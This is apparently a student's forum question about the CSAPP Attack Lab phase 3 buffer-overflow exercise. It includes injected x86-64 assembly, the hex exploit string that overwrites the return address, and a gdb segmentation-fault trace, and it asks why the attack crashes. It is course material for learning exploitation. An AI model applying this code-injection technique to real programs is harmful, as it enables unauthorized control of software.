I'm currently working on the CSAPP Attack Lab, specifically part 1 phase 3. You can find the complete instructions on page 8 of this PDF: Attack Lab
To begin, I crafted the injection code outlined below:
# Move the address of the string into $rdi
# %rsp starts from 0x5561dc78
# Note that the position of the target string can't be lower than the position storing the address of touch3, otherwise when calling touch3 and hexmatch, the push instruction will overwrite the target string by decreasing rsp
movq $0x5561dc90, %rdi
movq $0x5561dc88, %rsp
ret
Here's the corresponding machine-level code:
48 c7 c7 90 dc 61 55 48
c7 c4 88 dc 61 55 c3 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
However, I encountered a segmentation fault with the following error message:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e57dcd in _IO_str_init_static_internal (sf=sf@entry=0x5561d9c8,
ptr=ptr@entry=0x5561dbfb "", size=size@entry=18446744073709551615,
pstart=pstart@entry=0x5561dbfb "") at strops.c:41
41 in strops.c
It seems to be related to sprintf, but I'm struggling to understand why this occurred. The advice in the writeup mentions:
When functions
hexmatchandstrncmpare called, they push data onto the stack, overwriting portions of memory that held the buffer used bygetbuf. As a result, you will need to be careful about where you place the string representation of your cookie.
I discovered that a valid solution involves storing the target string in the stack of test(). While this workaround works, I'm still eager to understand why I encountered this error.